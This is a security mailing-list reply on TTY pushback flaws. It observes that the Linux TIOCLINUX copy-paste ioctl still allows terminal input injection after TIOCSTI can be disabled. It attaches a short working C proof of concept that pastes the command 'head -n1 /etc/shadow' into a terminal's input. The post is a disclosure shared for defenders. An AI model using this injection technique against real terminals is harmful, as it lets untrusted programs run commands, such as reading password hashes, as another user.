[prev in list] [next in list] [prev in thread] [next in thread] 

List:       oss-security
Subject:    Re: [oss-security] TTY pushback vulnerabilities / TIOCSTI
From:       Jakub Wilk <jwilk () jwilk ! net>
Date:       2023-03-14 10:36:26
Message-ID: 20230314103626.3ucbt2rjdfhjbe6t () jwilk ! net
[Download RAW message or body]

* Hanno Böck <hanno@hboeck.de>, 2023-03-14 09:51:
>In the 2017 post solar designer mentioned that the Linux kernel 
>developers have multiple times rejected changes in the kernel.

I believe this is the post in question:
https://www.openwall.com/lists/oss-security/2017/06/03/9

>Starting with Kernel 6.2 it is possible to disable TIOCSTI (unset 
>CONFIG_LEGACY_TIOCSTI).

Nice, but...

On Linux virtual terminals, it's possible to achieve pretty much the 
same effect using TIOCLINUX, the ioctl used by gpm to implement 
copy&pasting.

I've attached a minimal PoC. A more elaborate one is here:
https://github.com/jwilk/ttyjack

-- 
Jakub Wilk

["minittyjack.c" (text/x-csrc)]

#include <stdio.h>
#include <sys/ioctl.h>

#include <linux/tiocl.h>
#include <linux/vt.h>

int main(void)
{
    printf("\33[H\33[2J");
    printf("head -n1 /etc/shadow\n");
    fflush(stdout);
    struct {
        char padding;
        char subcode;
        struct tiocl_selection sel;
    } data = {
        .subcode = TIOCL_SETSEL,
        .sel = {
            .xs = 1, .ys = 1,
            .xe = 1, .ye = 1,
            .sel_mode = TIOCL_SELLINE
        }
    };
    ioctl(0, TIOCLINUX, &data.subcode);
    data.subcode = TIOCL_PASTESEL;
    ioctl(0, TIOCLINUX, &data.subcode);
}


[prev in list] [next in list] [prev in thread] [next in thread] 

Configure | About | News | Add a list | Sponsored by KoreLogic